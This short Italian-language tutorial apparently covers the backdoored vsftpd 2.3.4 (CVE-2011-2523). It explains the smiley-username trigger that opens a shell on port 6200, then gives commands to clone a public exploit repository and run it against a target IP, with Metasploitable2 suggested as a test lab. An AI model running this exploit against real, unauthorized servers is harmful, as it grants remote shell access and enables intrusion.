
Exploit Python per vsftpd 2.3.4 - Esecuzione di comandi tramite backdoor
Very Secure FTP Daemon (vsftpd) è un server FTP per piattaforme Unix-like, inclusi i sistemi Linux. È distribuito sotto i termini della GNU General Public Licence. Supporta IPv6 e SSL.
Nel luglio 2011 è stato rivelato che la versione 2.3.4 di vsftpd, scaricabile dal sito principale, era stata compromessa. Gli utenti che accedono a un server vsftpd-2.3.4 modificato possono ottenere una shell di comando sulla porta 6200 inserendo una :) come nome utente. Non si trattava di un difetto di sicurezza in vsftpd; piuttosto, qualcuno aveva caricato una versione separata di vsftpd con una backdoor. Da allora il sito è stato migrato su Google App Engine.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/Lynk4/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP

Puoi testare l'exploit su Metasploitable2